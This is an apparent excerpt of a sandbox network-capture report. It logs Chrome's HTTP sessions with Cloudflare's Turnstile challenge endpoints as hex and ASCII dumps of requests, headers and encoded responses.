                                                                                                                                                Data Ascii: 1tpWHdgVFQ4T4BZQE96XWhnSFx6h2p7Yo5NkX5RlWRshJZ9lFiZfFxxmoOdpV6dmpiVX61qcIpoc2yNo3OBdXqwe5aVe8Grkp6+hZq3mIWWhYyJrJeGwJ6gwb2nxZOtraO00bDNq8Gyq82vudXDoLuz5Nm+3eC5xLuxtPPBs7m057a97+C47M3B28DfxgnfyvTb2+f658Pv0RLt8dfw2QgFDxr5DNn0GSPs4yL2CN/4JgMBDh36LSM19DI3GPM1
                                                                                                                                                2024-10-28 16:48:01 UTC1369INData Raw: 68 63 58 33 74 39 55 48 63 2f 64 59 64 49 69 34 6c 68 61 30 78 70 63 57 4f 56 61 6e 46 74 56 47 39 34 62 46 52 50 65 58 5a 58 6e 59 46 7a 70 5a 39 59 65 4a 68 2b 6f 35 74 6b 67 57 69 4f 6f 57 4f 42 69 57 2b 78 6c 62 46 77 6a 34 32 72 63 35 4b 6e 6d 37 43 73 75 70 79 4d 77 4a 61 57 67 4d 47 79 74 4c 36 4b 6d 4b 71 4b 6f 63 4f 39 78 62 32 67 78 73 37 42 71 4d 72 4d 71 61 79 6f 7a 5a 71 5a 79 36 43 77 34 4e 6a 5a 77 75 54 6b 34 65 4c 41 34 72 37 51 71 4d 48 66 78 74 2f 4f 77 65 53 73 78 64 7a 6f 79 39 48 39 33 75 50 57 2b 39 4c 31 38 4e 48 6b 30 74 50 61 2f 41 2f 4f 79 74 76 45 36 51 34 56 35 65 4d 51 41 2f 73 45 2f 65 33 37 47 67 44 70 44 74 55 55 33 78 45 68 46 39 2f 68 2f 76 6b 6b 41 78 38 45 49 69 6b 77 48 69 44 75 4b 42 67 49 42 2f 54 35 4d 66 55 63 47
                                                                                                                                                Data Ascii: hcX3t9UHc/dYdIi4lha0xpcWOVanFtVG94bFRPeXZXnYFzpZ9YeJh+o5tkgWiOoWOBiW+xlbFwj42rc5Knm7CsupyMwJaWgMGytL6KmKqKocO9xb2gxs7BqMrMqayozZqZy6Cw4NjZwuTk4eLA4r7QqMHfxt/OweSsxdzoy9H93uPW+9L18NHk0tPa/A/OytvE6Q4V5eMQA/sE/e37GgDpDtUU3xEhF9/h/vkkAx8EIikwHiDuKBgIB/T5MfUcG
                                                                                                                                                2024-10-28 16:48:01 UTC1369INData Raw: 67 67 30 4e 55 50 6e 71 43 69 59 2b 41 53 32 69 4f 68 6d 31 69 6b 6c 46 32 69 70 46 6f 64 59 31 73 66 57 31 56 64 34 4f 51 64 59 47 41 6c 70 61 6d 6f 6f 42 74 73 4c 4a 79 66 34 36 7a 74 49 2b 45 6b 72 53 4e 69 4a 61 34 75 49 79 4a 77 4b 75 51 73 37 79 67 6c 6f 47 2b 69 4d 72 48 7a 71 58 42 6f 6f 76 4e 78 37 58 57 73 38 6d 71 78 73 62 55 6d 71 6a 64 30 63 79 69 30 73 4b 76 33 72 4c 57 78 63 6d 31 36 65 69 34 79 65 4c 44 77 4b 7a 6b 31 66 62 50 36 4c 62 4a 79 75 37 4f 35 75 37 33 38 66 76 33 76 50 54 37 75 63 50 63 2f 66 6e 56 79 39 30 41 43 68 44 65 39 41 34 44 34 64 54 79 32 51 33 70 2b 77 6a 57 2f 66 77 4c 47 78 30 68 4a 77 6a 2b 33 75 4d 47 4a 4f 54 71 44 43 6b 6f 45 67 63 67 4a 41 38 69 37 54 45 7a 46 54 6a 32 43 42 49 4c 46 67 34 66 2f 43 55 68 2f 45
                                                                                                                                                Data Ascii: gg0NUPnqCiY+AS2iOhm1iklF2ipFodY1sfW1Vd4OQdYGAlpamooBtsLJyf46ztI+EkrSNiJa4uIyJwKuQs7ygloG+iMrHzqXBoovNx7XWs8mqxsbUmqjd0cyi0sKv3rLWxcm16ei4yeLDwKzk1fbP6LbJyu7O5u738fv3vPT7ucPc/fnVy90AChDe9A4D4dTy2Q3p+wjW/fwLGx0hJwj+3uMGJOTqDCkoEgcgJA8i7TEzFTj2CBILFg4f/CUh/E
                                                                                                                                                2024-10-28 16:48:01 UTC1369INData Raw: 61 47 79 41 5a 6d 56 65 62 70 47 4b 64 34 79 52 64 48 32 51 58 70 4f 42 6b 46 6c 31 63 4a 56 33 65 33 65 6f 59 70 64 39 64 57 57 48 66 34 6d 73 68 59 4f 54 6b 36 4b 55 6c 71 6d 6e 6d 71 78 39 74 4a 76 41 77 4a 75 51 78 4b 61 61 6f 38 65 34 74 70 61 37 78 4b 69 78 6d 70 47 70 6e 74 50 51 74 61 53 78 79 63 36 37 71 71 76 54 77 65 43 68 32 4d 57 75 74 72 32 33 77 64 6a 4a 75 4d 71 2b 79 72 72 66 35 4e 7a 56 30 72 4c 69 31 4e 61 32 35 73 76 39 36 4f 2f 62 79 73 48 75 34 39 2f 65 33 4e 54 53 77 64 37 57 2f 4d 59 44 37 2b 72 52 43 65 38 56 46 65 2f 6b 47 66 72 75 39 78 33 64 43 4f 2f 36 34 66 37 75 47 76 37 34 39 50 4c 32 46 51 6b 64 4c 51 34 43 43 69 6f 6e 46 41 50 31 4a 51 72 79 45 78 59 49 4c 66 55 51 44 6a 45 51 48 68 4e 46 44 7a 55 71 4a 77 4d 35 4c 45 30
                                                                                                                                                Data Ascii: aGyAZmVebpGKd4yRdH2QXpOBkFl1cJV3e3eoYpd9dWWHf4mshYOTk6KUlqmnmqx9tJvAwJuQxKaao8e4tpa7xKixmpGpntPQtaSxyc67qqvTweCh2MWutr23wdjJuMq+yrrf5NzV0rLi1Na25sv96O/bysHu49/e3NTSwd7W/MYD7+rRCe8VFe/kGfru9x3dCO/64f7uGv749PL2FQkdLQ4CCionFAP1JQryExYILfUQDjEQHhNFDzUqJwM5LE0
                                                                                                                                                2024-10-28 16:48:01 UTC1369INData Raw: 47 4f 42 64 33 61 56 65 58 31 6d 58 58 64 76 61 6f 4b 4d 63 5a 52 75 67 49 6d 42 5a 59 42 37 64 6e 61 4b 66 71 43 73 68 5a 56 2b 68 6f 32 48 6b 61 69 5a 69 4a 71 4f 71 49 79 4b 67 72 61 6a 75 49 4b 67 70 37 7a 4a 74 61 75 38 6a 63 53 78 6d 71 4b 70 6f 36 33 45 74 61 53 32 71 72 61 6d 79 39 44 49 77 62 36 65 7a 73 44 43 6f 74 4c 48 33 4b 48 59 76 61 62 47 33 4c 76 66 37 4d 62 42 35 4d 4c 48 32 64 62 31 31 4e 71 31 39 65 6a 65 38 4d 48 34 35 63 37 61 32 64 4c 69 42 76 37 72 36 67 34 45 37 4f 34 4f 41 50 4c 4e 30 51 58 70 30 76 49 46 36 4f 62 65 45 77 41 56 45 68 6b 42 41 78 34 56 42 78 33 70 47 66 30 75 41 41 51 41 4d 65 6f 63 42 76 33 74 45 41 67 53 4e 51 34 4d 48 42 77 72 45 45 45 2b 47 78 51 50 44 79 4d 57 4f 45 59 6a 48 43 5a 46 49 7a 49 62 49 79 6f 6b
                                                                                                                                                Data Ascii: GOBd3aVeX1mXXdvaoKMcZRugImBZYB7dnaKfqCshZV+ho2HkaiZiJqOqIyKgrajuIKgp7zJtau8jcSxmqKpo63EtaS2qramy9DIwb6ezsDCotLH3KHYvabG3Lvf7MbB5MLH2db11Nq19eje8MH45c7a2dLiBv7r6g4E7O4OAPLN0QXp0vIF6ObeEwAVEhkBAx4VBx3pGf0uAAQAMeocBv3tEAgSNQ4MHBwrEEE+GxQPDyMWOEYjHCZFIzIbIyok


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                42192.168.2.1649772104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:48:03 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/529245995:1730132305:Laa5oq2m73aFLJir1YIIar-kFQTXq6O2pduGpfcbM2U/8d9c69278df22e27/PxLt5hfjqiTPx0sjtRTM1yJo9d0uOquA7rEns6f87xg-1730134078-1.1.1.1-IuqPdMWPk2MuuPdmgmf36o4gSheMJLGvteZUcwaHmaE8n7ftlDUr4X5m_WkV.81V HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:48:03 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 28 Oct 2024 16:48:03 GMT
                                                                                                                                                Content-Type: application/json
                                                                                                                                                Content-Length: 7
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                cf-chl-out: v5NaMegc6efhzg8ieQdnfe4Ay7XCT5+bBSA=$0OVYBWOkGVxjLxRS
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c69435c5deb02-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:48:03 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                Data Ascii: invalid


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                43192.168.2.1649773104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:48:03 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8d9c69278df22e27/1730134081331/HTYBVlYO-jFT7-s HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/inwdh/0x4AAAAAAAjGd7wY-0w5WfUZ/auto/fbE/normal/auto/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:48:03 UTC200INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:48:03 GMT
                                                                                                                                                Content-Type: image/png
                                                                                                                                                Content-Length: 61
                                                                                                                                                Connection: close
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c6944cd343165-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:48:03 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 54 00 00 00 63 08 02 00 00 00 8a 76 b0 83 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                Data Ascii: PNGIHDRTcvIDAT$IENDB`


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                44192.168.2.1649774104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:48:04 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8d9c69278df22e27/1730134081331/HTYBVlYO-jFT7-s HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:48:04 UTC200INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:48:04 GMT
                                                                                                                                                Content-Type: image/png
                                                                                                                                                Content-Length: 61
                                                                                                                                                Connection: close
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c69498ca00bff-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:48:04 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 54 00 00 00 63 08 02 00 00 00 8a 76 b0 83 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                Data Ascii: PNGIHDRTcvIDAT$IENDB`


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                45192.168.2.1649775104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:48:04 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8d9c69278df22e27/1730134081332/8ab4824bd712c48db70a586f4db3523bbce01cf19d29a29c45a25558c454549d/AwHEUhWTjCn8Lyu HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/inwdh/0x4AAAAAAAjGd7wY-0w5WfUZ/auto/fbE/normal/auto/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:48:04 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                Date: Mon, 28 Oct 2024 16:48:04 GMT
                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                Content-Length: 1
                                                                                                                                                Connection: close
                                                                                                                                                2024-10-28 16:48:04 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 69 72 53 43 53 39 63 53 78 49 32 33 43 6c 68 76 54 62 4e 53 4f 37 7a 67 48 50 47 64 4b 61 4b 63 52 61 4a 56 57 4d 52 55 56 4a 30 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20girSCS9cSxI23ClhvTbNSO7zgHPGdKaKcRaJVWMRUVJ0AGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                2024-10-28 16:48:04 UTC1INData Raw: 4a
                                                                                                                                                Data Ascii: J


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                46192.168.2.1649776104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:48:05 UTC1150OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/529245995:1730132305:Laa5oq2m73aFLJir1YIIar-kFQTXq6O2pduGpfcbM2U/8d9c69278df22e27/PxLt5hfjqiTPx0sjtRTM1yJo9d0uOquA7rEns6f87xg-1730134078-1.1.1.1-IuqPdMWPk2MuuPdmgmf36o4gSheMJLGvteZUcwaHmaE8n7ftlDUr4X5m_WkV.81V HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Content-Length: 31230
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                CF-Challenge: PxLt5hfjqiTPx0sjtRTM1yJo9d0uOquA7rEns6f87xg-1730134078-1.1.1.1-IuqPdMWPk2MuuPdmgmf36o4gSheMJLGvteZUcwaHmaE8n7ftlDUr4X5m_WkV.81V
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/inwdh/0x4AAAAAAAjGd7wY-0w5WfUZ/auto/fbE/normal/auto/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:48:05 UTC16384OUTData Raw: 76 5f 38 64 39 63 36 39 32 37 38 64 66 32 32 65 32 37 3d 42 52 57 77 63 53 73 4f 50 75 57 73 52 25 32 62 62 36 39 73 63 58 2d 47 75 73 67 58 4c 78 77 4b 77 79 52 36 72 58 76 77 53 43 78 53 32 4d 58 34 77 2d 6f 58 56 58 51 77 55 6f 77 58 24 57 79 58 66 77 4a 7a 24 58 65 4a 44 50 73 46 65 4a 67 58 58 2d 58 75 6f 73 54 79 58 2b 54 66 78 45 58 65 66 58 54 77 47 4f 58 50 45 78 45 45 47 58 4a 44 52 73 49 58 57 57 58 33 58 57 49 2d 57 44 49 77 53 68 2b 66 35 55 6e 4a 38 64 58 73 44 77 73 59 75 57 70 44 58 65 54 51 58 53 33 39 78 35 67 73 64 7a 57 58 46 77 36 51 74 58 58 6e 52 54 65 38 4f 64 58 39 50 35 67 51 62 51 2b 39 79 53 44 67 49 57 70 66 58 73 51 39 58 58 52 58 45 6e 51 44 54 74 77 7a 2b 63 44 44 48 76 70 47 67 7a 62 58 6e 6a 4e 68 50 6a 56 42 4c 7a 24 47
                                                                                                                                                Data Ascii: v_8d9c69278df22e27=BRWwcSsOPuWsR%2bb69scX-GusgXLxwKwyR6rXvwSCxS2MX4w-oXVXQwUowX$WyXfwJz$XeJDPsFeJgXX-XuosTyX+TfxEXefXTwGOXPExEEGXJDRsIXWWX3XWI-WDIwSh+f5UnJ8dXsDwsYuWpDXeTQXS39x5gsdzWXFw6QtXXnRTe8OdX9P5gQbQ+9ySDgIWpfXsQ9XXRXEnQDTtwz+cDDHvpGgzbXnjNhPjVBLz$G
                                                                                                                                                2024-10-28 16:48:05 UTC14846OUTData Raw: 44 58 58 53 48 6d 58 2d 50 47 50 53 78 36 24 73 7a 64 55 78 62 58 42 6f 2b 6f 53 75 58 38 34 47 64 58 62 64 65 70 75 50 44 44 58 2d 6c 6e 6c 52 56 77 35 77 66 58 70 57 58 51 58 55 50 36 48 43 41 77 36 57 58 78 58 6f 4c 42 64 73 24 58 64 64 2b 58 73 46 77 34 77 79 24 36 4b 58 64 77 53 57 73 33 69 72 77 58 50 73 56 58 57 58 43 50 53 7a 58 61 77 55 50 53 53 58 54 77 47 6f 53 56 58 62 58 58 52 36 54 43 2b 77 65 7a 44 35 77 6b 77 43 58 36 33 58 78 58 73 4f 53 38 58 6e 58 73 63 53 64 39 47 4b 2b 6c 71 66 73 6e 58 47 4b 58 47 58 62 58 47 52 58 48 77 77 77 46 34 75 77 58 2d 58 39 58 53 46 75 7a 46 43 6d 69 6d 58 56 52 79 45 73 70 73 4b 77 74 57 2b 53 58 38 77 57 47 71 75 58 67 58 58 50 70 6f 58 42 70 43 48 63 4c 64 49 58 4f 45 39 33 52 69 47 58 49 71 63 50 64 6b
                                                                                                                                                Data Ascii: DXXSHmX-PGPSx6$szdUxbXBo+oSuX84GdXbdepuPDDX-lnlRVw5wfXpWXQXUP6HCAw6WXxXoLBds$Xdd+XsFw4wy$6KXdwSWs3irwXPsVXWXCPSzXawUPSSXTwGoSVXbXXR6TC+wezD5wkwCX63XxXsOS8XnXscSd9GK+lqfsnXGKXGXbXGRXHwwwF4uwX-X9XSFuzFCmimXVRyEspsKwtW+SX8wWGquXgXXPpoXBpCHcLdIXOE93RiGXIqcPdk
                                                                                                                                                2024-10-28 16:48:05 UTC330INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:48:05 GMT
                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                Content-Length: 26316
                                                                                                                                                Connection: close
                                                                                                                                                cf-chl-gen: WigeAVEkAveE5JUvFCHyEGJbmAOdokPs0QD2x+uqOtgqE2sWUovwiMlGyaDkaV/pFvgURHPqB3/i/FGq$A+rS09h2nHBdykgm
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c69520c562839-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:48:05 UTC1039INData Raw: 65 30 56 76 5a 5a 4f 55 63 31 5a 51 63 34 6c 63 58 6e 4a 2f 6b 71 4f 64 67 33 64 76 6c 58 39 37 63 36 68 6d 61 61 36 73 71 57 6c 78 6e 49 68 2f 64 49 69 78 63 48 46 37 6d 36 6c 33 71 34 71 61 76 61 79 39 6e 37 6d 6e 68 61 50 42 6d 38 79 70 76 34 79 76 78 72 71 6a 6e 4c 4b 79 70 63 2b 52 78 73 72 4b 79 4c 58 67 77 64 47 78 34 37 54 47 73 37 50 6b 35 75 6e 41 75 37 72 72 35 73 72 4b 72 72 50 6d 72 38 37 71 34 72 48 4b 31 50 4b 30 33 62 65 32 31 37 76 57 31 4d 33 47 39 66 58 2b 78 77 6a 4b 78 73 7a 58 38 4f 41 53 37 63 2f 48 38 4e 2f 50 7a 2f 48 33 36 41 37 2b 47 52 77 69 37 2f 7a 38 34 2b 59 59 48 76 51 57 4a 67 59 59 48 42 6f 78 4c 77 77 65 42 2b 66 75 43 51 73 4c 4b 7a 4d 70 47 69 38 71 44 78 63 30 46 69 34 33 51 43 63 35 51 79 63 2f 53 6b 5a 44 4b 45 49
                                                                                                                                                Data Ascii: e0VvZZOUc1ZQc4lcXnJ/kqOdg3dvlX97c6hmaa6sqWlxnIh/dIixcHF7m6l3q4qavay9n7mnhaPBm8ypv4yvxrqjnLKypc+RxsrKyLXgwdGx47TGs7Pk5unAu7rr5srKrrPmr87q4rHK1PK03be217vW1M3G9fX+xwjKxszX8OAS7c/H8N/Pz/H36A7+GRwi7/z84+YYHvQWJgYYHBoxLwweB+fuCQsLKzMpGi8qDxc0Fi43QCc5Qyc/SkZDKEI
                                                                                                                                                2024-10-28 16:48:05 UTC1369INData Raw: 72 58 33 53 58 6f 70 35 6b 68 61 4f 6b 66 6f 43 62 61 57 35 2b 68 71 32 43 6a 59 4b 64 6c 6f 36 4e 6a 47 79 59 6e 5a 47 32 71 6f 2b 62 76 37 69 5a 77 38 57 64 79 59 4f 59 68 62 76 4c 72 5a 6e 48 70 34 36 4d 30 34 79 4e 77 4e 4b 70 6b 37 4c 46 6d 72 4c 41 72 73 4b 79 73 36 7a 62 74 61 58 70 33 71 6d 2b 37 65 6e 67 7a 65 76 75 37 4f 50 6e 37 4d 72 56 7a 2f 61 73 78 63 6e 61 74 66 4c 66 31 4c 6a 76 7a 66 75 2f 2b 76 50 64 41 2b 4c 39 44 4d 6a 67 45 74 6e 77 2f 65 4d 4e 39 65 45 56 2b 66 58 35 47 50 30 48 39 78 4d 52 49 50 7a 64 38 68 6b 43 49 4f 55 61 42 67 30 4a 41 67 30 41 48 79 44 39 46 43 67 58 44 41 59 79 4f 2f 63 65 42 78 45 57 4b 53 31 43 4d 44 51 57 4f 50 30 67 49 76 77 6a 42 79 41 6a 53 78 73 76 4e 45 46 4a 4e 55 30 6d 49 6a 45 36 4e 7a 34 6f 4c 42
                                                                                                                                                Data Ascii: rX3SXop5khaOkfoCbaW5+hq2CjYKdlo6NjGyYnZG2qo+bv7iZw8WdyYOYhbvLrZnHp46M04yNwNKpk7LFmrLArsKys6zbtaXp3qm+7engzevu7OPn7MrVz/asxcnatfLf1Ljvzfu/+vPdA+L9DMjgEtnw/eMN9eEV+fX5GP0H9xMRIPzd8hkCIOUaBg0JAg0AHyD9FCgXDAYyO/ceBxEWKS1CMDQWOP0gIvwjByAjSxsvNEFJNU0mIjE6Nz4oLB
                                                                                                                                                2024-10-28 16:48:05 UTC1369INData Raw: 6e 48 4b 68 5a 32 46 71 71 71 61 6a 70 37 43 45 70 5a 46 2f 6c 33 61 69 6b 61 4f 75 6b 62 61 66 73 5a 36 42 6e 4a 79 39 76 72 4f 2f 6c 49 61 71 6f 4d 79 65 72 4a 6a 46 73 4b 2f 53 72 63 54 4a 69 63 2f 4d 71 6f 32 39 70 63 2f 4a 6e 73 4c 44 72 4e 57 58 77 64 47 31 31 75 71 71 76 4c 71 6f 79 4c 2f 79 78 75 75 78 38 4d 50 4d 34 38 58 55 39 62 6e 58 31 76 33 77 7a 76 33 65 30 64 4c 57 39 4d 6a 61 43 76 50 5a 33 39 6a 50 32 63 50 6c 42 75 51 44 42 65 4d 43 34 78 41 61 33 50 50 70 33 2b 7a 77 4a 4e 37 77 47 51 4d 42 42 43 73 4b 47 50 72 34 49 65 73 4c 44 68 41 6a 44 52 4c 77 44 52 4d 71 43 54 45 64 4e 68 6f 4e 46 43 41 7a 42 50 73 30 41 68 31 46 4f 41 6b 6b 51 45 6b 6c 4d 53 38 7a 45 55 41 73 48 6b 42 43 55 53 63 55 50 45 59 36 58 42 5a 4e 55 6a 4e 65 52 57 52
                                                                                                                                                Data Ascii: nHKhZ2Fqqqajp7CEpZF/l3aikaOukbafsZ6BnJy9vrO/lIaqoMyerJjFsK/SrcTJic/Mqo29pc/JnsLDrNWXwdG11uqqvLqoyL/yxuux8MPM48XU9bnX1v3wzv3e0dLW9MjaCvPZ39jP2cPlBuQDBeMC4xAa3PPp3+zwJN7wGQMBBCsKGPr4IesLDhAjDRLwDRMqCTEdNhoNFCAzBPs0Ah1FOAkkQEklMS8zEUAsHkBCUScUPEY6XBZNUjNeRWR
                                                                                                                                                2024-10-28 16:48:05 UTC1369INData Raw: 59 65 64 65 5a 74 79 6b 71 75 6c 63 48 57 71 69 37 71 33 76 61 70 32 71 4a 36 38 6a 35 61 63 76 34 36 45 75 59 65 55 78 4a 72 4e 70 4c 43 68 71 70 79 6c 70 35 32 6e 6b 72 61 56 79 39 69 70 72 70 79 63 72 4e 7a 64 6e 65 47 35 31 4c 57 37 6e 37 4c 46 78 71 53 74 36 4d 6e 78 78 2f 44 54 36 65 50 44 77 75 6d 36 74 64 43 32 76 74 72 59 75 63 48 30 37 77 66 56 37 2f 41 41 2b 64 6b 4a 41 39 72 75 38 50 33 51 43 65 59 54 37 4f 73 4e 31 68 6b 53 43 4e 67 55 31 69 44 30 49 42 4d 64 42 43 4d 62 34 66 45 6d 43 4e 34 48 4a 67 59 62 4b 41 73 79 2f 51 63 6e 37 7a 59 6b 47 66 6f 63 46 7a 73 35 51 53 38 30 4d 68 51 53 4e 42 77 71 48 53 6b 35 54 67 55 4e 50 69 5a 51 50 56 4d 4c 55 78 63 6d 49 69 63 36 56 54 41 6f 47 46 77 65 4e 43 46 57 55 6c 73 64 48 7a 6c 68 58 31 39 59
